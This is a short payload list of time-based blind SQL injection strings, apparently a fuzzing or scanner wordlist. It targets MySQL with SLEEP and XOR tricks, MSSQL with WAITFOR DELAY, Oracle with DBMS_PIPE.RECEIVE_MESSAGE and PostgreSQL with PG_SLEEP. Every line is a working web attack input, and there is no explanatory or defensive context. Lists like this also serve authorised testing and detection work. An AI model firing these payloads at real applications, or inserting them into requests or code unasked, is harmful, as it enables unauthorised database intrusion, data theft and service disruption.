 AND (SELECT 6150 FROM (SELECT(SLEEP(10)))ncsD)
'XOR(SELECT(0)FROM(SELECT(SLEEP(10)'XOR(SELECT(0)FROM(SELECT(SLEEP(6)))a)XOR'Z
'XOR(SELECT(0)FROM(SELECT(SLEEP(10)
0'XOR(if(now()=sysdate(),sleep(10),0))XOR'Z
sleep(10)#
' and sleep 10--
' and sleep 10
' and sleep 10 and '1'='1
OR (SELECT 1337 FROM (SELECT(SLEEP(10)))YYYY)-- 1337
;waitfor delay '0:0:10'--
';WAITFOR DELAY '0:0:10'--
or WAITFOR DELAY '0:0:10'
and WAITFOR DELAY '0:0:10'--
1 AND 1337=DBMS_PIPE.RECEIVE_MESSAGE(CHR(118)||CHR(71)||CHR(73)||CHR(86),10)
1 AND 1337=DBMS_PIPE.RECEIVE_MESSAGE(CHR(118)||CHR(71)||CHR(73)||CHR(86),10)-- 1337
' AND 1337=DBMS_PIPE.RECEIVE_MESSAGE(CHR(118)||CHR(71)||CHR(73)||CHR(86),10) AND '1337'='1337
') AND 1337=DBMS_PIPE.RECEIVE_MESSAGE(CHR(118)||CHR(71)||CHR(73)||CHR(86),10) AND ('1337'='1337
) AND 1337=DBMS_PIPE.RECEIVE_MESSAGE(CHR(118)||CHR(71)||CHR(73)||CHR(86),10) AND (1337=1337
1 AND 1337=(SELECT 1337 FROM PG_SLEEP(10))
1 AND 1337=(SELECT 1337 FROM PG_SLEEP(10))-- 1337
